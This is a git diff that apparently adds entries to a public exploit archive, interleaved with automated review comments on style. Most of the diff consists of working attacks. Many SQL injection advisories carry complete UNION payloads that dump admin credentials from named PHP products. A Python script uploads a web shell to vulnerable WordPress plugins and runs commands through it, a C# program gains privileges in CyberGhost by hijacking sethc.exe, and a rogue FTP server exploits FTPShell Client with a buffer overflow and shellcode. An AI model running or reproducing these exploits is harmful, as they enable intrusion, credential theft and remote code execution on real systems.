+# -8'+/*!50000union*/+select+1,2,3,0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,/*!50000concat*/(userid,0x3a,password),29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54+from+adminlogin--+-
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41526.txt b/platforms/php/webapps/41526.txt
new file mode 100755
index 000000000..2d93e2e46
--- /dev/null
+++ b/platforms/php/webapps/41526.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: MLM Binary Plan Script v2.0.5 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/mlm-binary-plan-script/
+# Demo: http://74.124.215.220/~binamlm/
+# Version: 2.0.5
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/testimonials_read.php?tid=[SQL]
+# For example;
+# -1'+/*!50000union*/+select+1,2,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),5,6,7,8-- -
+# mlm_admin :admin_id
+# mlm_admin :admin_username
+# mlm_admin :admin_password
+# mlm_admin :admin_status
+# -1'+/*!50000union*/+select+1,2,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000concat*/(admin_username,0x3a,admin_password),5,6,7,8+from+mlm_admin--+-
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/41527.txt b/platforms/php/webapps/41527.txt
new file mode 100755
index 000000000..2dd6c22fe
--- /dev/null
+++ b/platforms/php/webapps/41527.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: MLM Forced Matrix v2.0.7 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/mlm-forced-matrix/
+# Demo: http://74.124.215.220/~forctrix/
+# Version: 2.0.7
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/news_detail.php?newid=[SQL]
+# http://localhost/[PATH]/event_detail.php?eventid=[SQL]
+# For example;
+# -21'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),4,5,6--+-
+# mlm_admin :admin_id
+# mlm_admin :admin_username
+# mlm_admin :admin_password
+# mlm_admin :admin_status
+# -21'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000concat*/(admin_username,0x3a,admin_password),4,5,6+from+mlm_admin--+-
+# -13'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000concat*/(admin_username,0x3a,admin_password),4,5,6,7+from+mlm_admin--+-
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41528.txt b/platforms/php/webapps/41528.txt
new file mode 100755
index 000000000..fd3fde7dd
--- /dev/null
+++ b/platforms/php/webapps/41528.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: MLM Forex Market Plan Script v2.0.1 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/mlm-forex-market-plan-script/
+# Demo: http://74.124.215.220/~forexmlm/
+# Version: 2.0.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/news_detail.php?newid=[SQL]
+# http://localhost/[PATH]/event_detail.php?eventid=[SQL]
+# For example;
+# -3'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),4,5,6--+-
+# mlm_admin :admin_id
+# mlm_admin :admin_username
+# mlm_admin :admin_password
+# mlm_admin :admin_status
+# -3'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000concat*/(admin_username,0x3a,admin_password),4,5,6+from+mlm_admin--+-
+# -3'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000concat*/(admin_username,0x3a,admin_password),4,5,6,7+from+mlm_admin--+-
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41529.txt b/platforms/php/webapps/41529.txt
new file mode 100755
index 000000000..f36f3eaec
--- /dev/null
+++ b/platforms/php/webapps/41529.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: MLM Membership Plan Script v2.0.5 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/mlm-membership-plan-script/
+# Demo: http://74.124.215.220/~membipmlm/
+# Version: 2.0.5
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/news_detail.php?newid=[SQL]
+# http://localhost/[PATH]/event_detail.php?eventid=[SQL]
+# For example;
+# -3'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),4,5,6--+-
+# mlm_admin :admin_id
+# mlm_admin :admin_username
+# mlm_admin :admin_password
+# mlm_admin :admin_status
+# -3'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000concat*/(admin_username,0x3a,admin_password),4,5,6+from+mlm_admin--+-
+# -3'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000concat*/(admin_username,0x3a,admin_password),4,5,6,7+from+mlm_admin--+-
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41530.txt b/platforms/php/webapps/41530.txt
new file mode 100755
index 000000000..0973b96b7
--- /dev/null
+++ b/platforms/php/webapps/41530.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: Multireligion Responsive Matrimonial Script v4.7.1 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/multireligion-responsive-matrimonial/
+# Demo: http://74.124.215.220/~matridemo/multi-religion/
+# Version: 4.7.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search-smart-result.php?cityse=Smart+Search&gender=Male&subcaste=[SQL]&diet=[SQL]&smoke=[SQL]&drink=[SQL]&body_type=[SQL]&familyvalue=[SQL]&familystatus=[SQL]&asubmit=SEARCH
+# # # # #
diff --git a/platforms/php/webapps/41531.txt b/platforms/php/webapps/41531.txt
new file mode 100755
index 000000000..d16bcbaeb
--- /dev/null
+++ b/platforms/php/webapps/41531.txt
@@ -0,0 +1,28 @@
+# # # # #
+# Exploit Title: Network Community Script v3.0.2 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/network-community/
+# Demo: http://socialcommunityscript.com/products/business_network/
+# Version: 3.0.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/refer_job_view.php?jview=[SQL]
+# For example;
+# -1'+/*!50000union*/+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),16,17,18,19,20,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,22,23--+-
+# admin :admin_id
+# admin :admin_name
+# admin :username
+# admin :adminpassword
+# admin :email
+# -1'+/*!50000union*/+select+1,2,3,4,5,6,/*!50000ConCat(*/username,/*!50000char*/(58),adminpassword),8,9,10,11,12,13,14,15,16,17,18,19,20,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,22,23+/*!50000from*/+admin--+-
+# Etc...
+# # # # #
+
+
diff --git a/platforms/php/webapps/41532.txt b/platforms/php/webapps/41532.txt
new file mode 100755
index 000000000..77999c480
--- /dev/null
+++ b/platforms/php/webapps/41532.txt
@@ -0,0 +1,28 @@
+# # # # #
+# Exploit Title: PHP B2B Script v3.05 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/php-b2b-script/
+# Demo: http://readymadeb2bscript.com/product/basic/
+# Version: 3.05
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/companyinfo.php?id=[SQL]
+# http://localhost/[PATH]/latest_selling_leads_details.php?bid=[SQL]
+# http://localhost/[PATH]/company_profile.php?id=[SQL]
+# For example;
+# -92'+/*!50000union*/+select+1,2,3,4,5,6,7,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),9,10,11,12,13,14,15,16,17,18,19,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,21,22,23,24--+-
+# admin :username
+# admin :password
+# admin_login :id
+# admin_login :username
+# admin_login :password
+# -92'+/*!50000union*/+select+1,2,3,4,5,6,7,/*!50000ConCat(*/username,/*!50000char*/(58),password),9,10,11,12,13,14,15,16,17,18,19,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,21,22,23,24+from+admin--+-
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41533.txt b/platforms/php/webapps/41533.txt
new file mode 100755
index 000000000..6f2d15ba5
--- /dev/null
+++ b/platforms/php/webapps/41533.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Responsive Matrimonial Script v4.0.1 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/responsive-matrimonial/
+# Demo: http://74.124.215.220/~responsivematri/
+# Version: 4.0.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/success_story.php?detail=[SQL]
+# http://localhost/[PATH]/search-results.php?gender=[SQL]Male&age_from=[SQL]&age_to=[SQL]&marital=[SQL]&religion=[SQL]&caste=[SQL]&mothertongue=[SQL]&country=[SQL]&education=[SQL]&Submit=search
+# For example;
+# -3'+/*!50000union*/+select+1,2,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,4,5,6,7,8,9,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),11,12,13,14,15,16,17,18,19--+-
+# adminlogin :admin_id
+# adminlogin :admin_username
+# adminlogin :admin_password
+# adminlogin :admin_email
+# adminlogin :admin_usertype
+# -3'+/*!50000union*/+select+1,2,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,4,5,6,7,8,9,/*!50000ConCat(*/admin_username,/*!50000char*/(58),admin_password),11,12,13,14,15,16,17,18,19+from+adminlogin--+-
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41534.txt b/platforms/php/webapps/41534.txt
new file mode 100755
index 000000000..0154ca9d1
--- /dev/null
+++ b/platforms/php/webapps/41534.txt
@@ -0,0 +1,26 @@
+# # # # #
+# Exploit Title: Schools Alert Management Script v2.01 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/schools-alert-management-system/
+# Demo: http://www.schoolcollageerp.com/schoolalert/
+# Version: 2.01
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/view_school_list.php?list_id=[SQL]
+# For example;
+# -14'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,3,4,5,6,7,8,9,10,11,12,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),14,15--+-
+# admin :Id
+# admin :AdminName
+# admin :AdminPass
+# admin :AdminEmail
+# admin :CreatedDate
+# -14'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,3,4,5,6,7,8,9,10,11,12,/*!50000ConCat(*/AdminName,/*!50000char*/(58),AdminPass),14,15+from+admin--+-
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/41535.txt b/platforms/php/webapps/41535.txt
new file mode 100755
index 000000000..8462da4b1
--- /dev/null
+++ b/platforms/php/webapps/41535.txt
@@ -0,0 +1,21 @@
+# # # # #
+# Exploit Title: Select Your College Script v2.01 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/select-your-college-script/
+# Demo: http://schoolcollageerp.com/selectyourcollege/
+# Version: 2.01
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/searchresult.php?institute=[SQL]
+# http://localhost/[PATH]/searchresult.php?namesearch&name=[SQL]
+# http://localhost/[PATH]/searchcourse.php?categoryid=[SQL]
+# http://localhost/[PATH]/collegedetails.php?id=[SQL]
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/41536.txt b/platforms/php/webapps/41536.txt
new file mode 100755
index 000000000..0e58d59d1
--- /dev/null
+++ b/platforms/php/webapps/41536.txt
@@ -0,0 +1,22 @@
+# # # # #
+# Exploit Title: Social Network Script v3.01 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/social-network-script/
+# Demo: http://myeliteprofile.com/
+# Version: 3.01
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/[SQL]
+# http://localhost/scrapbook.php?id=[SQL
+# http://localhost/profile_social.php?id=[SQL
+# http://localhost/my_bookmark.php?id=[SQL
+# http://localhost/profile_social.php?mode=addbookmark&id=[SQL
+# Etc... Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41539.txt b/platforms/php/webapps/41539.txt
new file mode 100755
index 000000000..e131743c4
--- /dev/null
+++ b/platforms/php/webapps/41539.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Website Broker Script v3.02 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/website-broker-script/
+# Demo: http://www.officialwebsiteforsale.com/official/
+# Version: 3.02
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/website_details_view.php?view=[SQL]
+# For example;
+# -224'+/*!50000union*/+select+1,2,3,4,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--+-
+# admin_login :id
+# admin_login :userid
+# admin_login :password
+# admin_users :user_id
+# admin_users :username
+# admin_users :password
+# -224'+/*!50000union*/+select+1,2,3,4,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000ConCat(*/userid,/*!50000char*/(58),password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+admin_login--+-
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/41540.py b/platforms/php/webapps/41540.py
new file mode 100755
index 000000000..a32cc0527
--- /dev/null
+++ b/platforms/php/webapps/41540.py
@@ -0,0 +1,58 @@
+import requests
+import random
+import string
+print "---------------------------------------------------------------------"
+print "Multiple Wordpress Plugin - Remote File Upload Exploit\nDiscovery: Larry W. Cashdollar\nExploit Author: Munir Njiru\nCWE: 434\n\n1. Zen App Mobile Native <=3.0 (CVE-2017-6104)\n2. Wordpress Plugin webapp-builder v2.0 (CVE-2017-1002002)\n3. Wordpress Plugin wp2android-turn-wp-site-into-android-app v1.1.4 CVE-2017-1002003)\n4.Wordpress Plugin mobile-app-builder-by-wappress v1.05 CVE-2017-1002001)\n5. Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0 (CVE-2017-1002000)\n\nReference URLs:\nhttp://www.vapidlabs.com/advisory.php?v=178\nhttp://www.vapidlabs.com/advisory.php?v=179\nhttp://www.vapidlabs.com/advisory.php?v=180\nhttp://www.vapidlabs.com/advisory.php?v=181\nhttp://www.vapidlabs.com/advisory.php?v=182"
+print "---------------------------------------------------------------------"
+victim = raw_input("Please Enter victim host e.g. http://example.com: ")
+plug_choice=raw_input ("\n Please choose a number representing the plugin to attack: \n1. Zen App Mobile Native <=3.0\n2. Wordpress Plugin webapp-builder v2.0\n3. Wordpress Plugin wp2android-turn-wp-site-into-android-app v1.1.4\n4.Wordpress Plugin mobile-app-builder-by-wappress v1.05\n5. Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0\n")
+if plug_choice=="1":
+ plugin="zen-mobile-app-native"
+elif plug_choice=="2":
+ plugin="webapp-builder"
+elif plug_choice=="3":
+ plugin="wp2android-turn-wp-site-into-android-app"
+elif plug_choice=="4":
+ plugin="mobile-app-builder-by-wappress"
+elif plug_choice=="5":
+ plugin="mobile-friendly-app-builder-by-easytouch"
+else:
+ print "Invalid Plugin choice, I will now exit"
+ quit()
+slug = "/wp-content/plugins/"+plugin+"/server/images.php"
+target=victim+slug
+def definShell(size=6, chars=string.ascii_uppercase + string.digits):
+ return ''.join(random.choice(chars) for _ in range(size))
+
+shellName= definShell()+".php"
+
+def checkExistence():
+ litmusTest = requests.get(target)
+ litmusState = litmusTest.status_code
+ if litmusState == 200:
+ print "\nTesting if vulnerable script is available\nI can reach the target & it seems vulnerable, I will attempt the exploit\nRunning exploit..."
+ exploit()
+ else:
+ print "Target has a funny code & might not be vulnerable, I will now exit\n"
+ quit()
+
+def exploit():
+ print "\nGenerating Payload: "+shellName+"\n"
+ myShell = {'file': (shellName, '')}
+ shellEmUp = requests.post(target, files=myShell)
+ respShell = shellEmUp.text
+ cleanURL = respShell.replace("http://example.com/",victim+"/wp-content/plugins/"+plugin+"/")
+ shellLoc = cleanURL.replace(" ", "")
+ print "Confirming shell upload by printing current user\n"
+ shellTest=requests.get(shellLoc+"?alien=whoami")
+ webserverUser=shellTest.text
+ if webserverUser == "":
+ print "I can't run the command can you try manually on the browser: \n"+shellLoc+"?alien=whoami"
+ quit()
+ else:
+ print "The current webserver user is: "+webserverUser+"\n"
+ print "Shell Can be controlled from the browser by running :\n"+shellLoc+"?alien=command"
+ quit()
+
+if __name__ == "__main__":
+ checkExistence()
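Review bot: The file has no header stating the interpreter or dependencies it was written against, although the `print "..."` statement form and the `raw_input` calls are Python 2-only syntax and `import requests` on the first line is a third-party package; the other files in this commit carry a `#`-style metadata header, so a comment block such as `# Requires: Python 2.x` and `# Dependencies: requests` above the imports would bring this one in line with them. The numbered CVE list in the first banner `print` also has unbalanced parentheses on items 3 and 4 (`CVE-2017-1002003)` and `CVE-2017-1002001)` without an opening `(`), which reads as a typo in the user-facing text.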
diff --git a/platforms/windows/local/41538.cs b/platforms/windows/local/41538.cs
new file mode 100755
index 000000000..a92a881a3
--- /dev/null
+++ b/platforms/windows/local/41538.cs
@@ -0,0 +1,38 @@
+# Exploit CyberGhost 6.0.4.2205 Privilege Escalation
+# Date: 06.03.2017
+# Software Link: http://www.cyberghostvpn.com/
+# Exploit Author: Kacper Szurek
+# Contact: https://twitter.com/KacperSzurek
+# Website: https://security.szurek.pl/
+# Category: local
+
+1. Description
+
+`CG6Service` service has method `SetPeLauncherState` which allows launch the debugger automatically for every process we want.
+
+https://security.szurek.pl/cyberghost-6042205-privilege-escalation.html
+
+2. Proof of Concept
+
+using System;
+using CyberGhost.Communication;
+
+namespace cyber
+{
+ class Program
+ {
+ static void Main(string[] args)
+ {
+ Console.WriteLine("CyberGhost 6.0.4.2205 Privilege Escalation");
+ Console.WriteLine("by Kacper Szurek");
+ Console.WriteLine("http://security.szurek.pl/");
+ Console.WriteLine("https://twitter.com/KacperSzurek");
+ PeLauncherOptions options = new PeLauncherOptions();
+ options.ExecuteableName = "sethc.exe";
+ options.PeLauncherExecuteable = @"c:\Windows\System32\cmd.exe";
+ EventSender CyberGhostCom = CyberGhostCom = new EventSender("CyherGhostPipe");
+ CyberGhostCom.SetPeLauncherState(options, PeLauncherOperation.Add);
+ Console.WriteLine("Now logout and then press SHIFT key 5 times");
+ }
+ }
+}
\ No newline at end of file
diff --git a/platforms/windows/remote/41511.py b/platforms/windows/remote/41511.py
new file mode 100755
index 000000000..3afd7a606
--- /dev/null
+++ b/platforms/windows/remote/41511.py
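Review bot: The `#`-prefixed header lines and the prose sections `1. Description` and `2. Proof of Concept` are not C# comment syntax, so `platforms/windows/local/41538.cs` is not a well-formed C# source file as committed even though its extension says it is; the `.txt` advisories in the same commit use this exact `#` header style, which suggests the file was written as a text advisory with an embedded listing. Either a `.txt` extension or wrapping the header and prose in `/* ... */` would make the file type agree with its content. Separately, `EventSender CyberGhostCom = CyberGhostCom = new EventSender("CyherGhostPipe");` assigns the same local twice in its own initializer; `EventSender CyberGhostCom = new EventSender("CyherGhostPipe");` is the conventional form.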
@@ -0,0 +1,68 @@
+# Exploit Title: FTPShell Client 6.53 buffer overflow on making initial connection
+# Date: 2017-03-04
+# Exploit Author: Peter Baris
+# Vendor Homepage: http://www.saptech-erp.com.au
+# Software Link: http://www.ftpshell.com/downloadclient.htm
+# Version: Windows Server 2008 R2 x64
+# Tested on: Windows Server 2008 R2 Standard x64
+# CVE: CVE-2017-6465
+
+# 2017-03-04: Software vendor notified
+# 2017-03-06: No reply
+# 2017-03-06: Publishing
+
+import socket
+import sys
+
+shell=("\xdb\xce\xbf\xaa\xcc\x44\xc9\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
+"\x52\x83\xc2\x04\x31\x7a\x13\x03\xd0\xdf\xa6\x3c\xd8\x08\xa4"
+"\xbf\x20\xc9\xc9\x36\xc5\xf8\xc9\x2d\x8e\xab\xf9\x26\xc2\x47"
+"\x71\x6a\xf6\xdc\xf7\xa3\xf9\x55\xbd\x95\x34\x65\xee\xe6\x57"
+"\xe5\xed\x3a\xb7\xd4\x3d\x4f\xb6\x11\x23\xa2\xea\xca\x2f\x11"
+"\x1a\x7e\x65\xaa\x91\xcc\x6b\xaa\x46\x84\x8a\x9b\xd9\x9e\xd4"
+"\x3b\xd8\x73\x6d\x72\xc2\x90\x48\xcc\x79\x62\x26\xcf\xab\xba"
+"\xc7\x7c\x92\x72\x3a\x7c\xd3\xb5\xa5\x0b\x2d\xc6\x58\x0c\xea"
+"\xb4\x86\x99\xe8\x1f\x4c\x39\xd4\x9e\x81\xdc\x9f\xad\x6e\xaa"
+"\xc7\xb1\x71\x7f\x7c\xcd\xfa\x7e\x52\x47\xb8\xa4\x76\x03\x1a"
+"\xc4\x2f\xe9\xcd\xf9\x2f\x52\xb1\x5f\x24\x7f\xa6\xed\x67\xe8"
+"\x0b\xdc\x97\xe8\x03\x57\xe4\xda\x8c\xc3\x62\x57\x44\xca\x75"
+"\x98\x7f\xaa\xe9\x67\x80\xcb\x20\xac\xd4\x9b\x5a\x05\x55\x70"
+"\x9a\xaa\x80\xd7\xca\x04\x7b\x98\xba\xe4\x2b\x70\xd0\xea\x14"
+"\x60\xdb\x20\x3d\x0b\x26\xa3\x82\x64\xee\xb3\x6b\x77\xee\xa2"
+"\x37\xfe\x08\xae\xd7\x56\x83\x47\x41\xf3\x5f\xf9\x8e\x29\x1a"
+"\x39\x04\xde\xdb\xf4\xed\xab\xcf\x61\x1e\xe6\xad\x24\x21\xdc"
+"\xd9\xab\xb0\xbb\x19\xa5\xa8\x13\x4e\xe2\x1f\x6a\x1a\x1e\x39"
+"\xc4\x38\xe3\xdf\x2f\xf8\x38\x1c\xb1\x01\xcc\x18\x95\x11\x08"
+"\xa0\x91\x45\xc4\xf7\x4f\x33\xa2\xa1\x21\xed\x7c\x1d\xe8\x79"
+"\xf8\x6d\x2b\xff\x05\xb8\xdd\x1f\xb7\x15\x98\x20\x78\xf2\x2c"
+"\x59\x64\x62\xd2\xb0\x2c\x92\x99\x98\x05\x3b\x44\x49\x14\x26"
+"\x77\xa4\x5b\x5f\xf4\x4c\x24\xa4\xe4\x25\x21\xe0\xa2\xd6\x5b"
+"\x79\x47\xd8\xc8\x7a\x42")
+
+port = 21
+
+try:
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.bind(("0.0.0.0", port))
+ s.listen(5)
+ print("[i] FTP server started on port: "+str(port)+"\r\n")
+except:
+ print("[!] Failed to bind the server to port: "+str(port)+"\r\n")
+
+
+
+# 004b95dc in ftpshell.exe PUSH ESI ; RETN
+eip = "\xdc\x95\x4b"
+nops = "\x90"*8
+junk = "A"*(400-len(nops)-len(shell))
+buffer = nops + shell + junk + eip
+
+while True:
+ conn, addr = s.accept()
+ conn.send('220 Welcome to your unfriendly FTP server\r\n')
+ print(conn.recv(1024))
+ conn.send("331 OK\r\n")
+ print(conn.recv(1024))
+ conn.send('230 OK\r\n')
+ print(conn.recv(1024))
+ conn.send('220 "'+buffer+'" is current directory\r\n')
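Review bot: The header's `# Version: Windows Server 2008 R2 x64` line names the operating system rather than the FTPShell Client release the title gives (6.53), and it largely duplicates the `# Tested on: Windows Server 2008 R2 Standard x64` line directly below it; `# Version: 6.53` would let the two fields carry distinct information. `import sys` is never used anywhere in the script, and the module-level name `buffer` shadows a Python 2 builtin, which is worth renaming for readability.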